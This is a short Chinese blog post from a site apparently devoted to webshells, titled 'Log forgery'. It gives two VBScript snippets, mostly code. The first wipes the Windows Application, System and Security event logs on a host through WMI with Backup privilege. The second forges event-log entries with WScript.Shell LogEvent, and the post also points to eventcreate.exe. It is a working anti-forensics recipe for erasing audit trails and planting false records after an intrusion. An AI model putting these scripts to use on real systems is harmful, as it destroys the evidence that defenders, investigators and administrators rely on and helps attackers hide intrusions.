日志的伪造

分类:安全 | 2011-09-25 | 撸过 42 次
0人扯谈

删除日志VBS:

cleanevent.vbs

strComputer = “主机名字By foolishqiang”

Set objWMIService = GetObject(”winmgmts:” _

& “{impersonationLevel=impersonate,(Backup)}!\\” & _

strComputer & “\root\cimv2″)

dim mylogs(3)

mylogs(1)=”application”

mylogs(2)=”system”

mylogs(3)=”security”

for Each logs in mylogs

Set colLogFiles = objWMIService.ExecQuery _

(”Select * from Win32_NTEventLogFile where LogFileName='”&logs&”‘”)

For Each objLogfile in colLogFiles

objLogFile.ClearEventLog()

Next

next

//////////////////////////////////////////////////

 

伪造日记,看代码:

///////////////////////////////////////////////

伪造一份日志

createlog.vbs

  set ws=wscript.createobject(”Wscript.shell”)

  ws.logevent 0 ,”write log success” ‘创建一个成功执行日志

  logevent方法

  logevent的用法:logevent eventtype,”description” [,remote system]

  eventtype 为日志类型,可以使用的如下:0 成功执行;1 执行出错;2 警告;4 信息;8 成功审计;16 故障审计

  所以上面代码中,把0改为1,2,4,8,16均可,引号下的为日志描述。

附:

XP下有一个新的工具可以创建日志eventcreate.exe

获得帮助格式eventcreate.exe /?

本站内容均为原创,转载请务必保留署名与链接!
日志的伪造:https://www.webshell.cc/1480.html

随机日志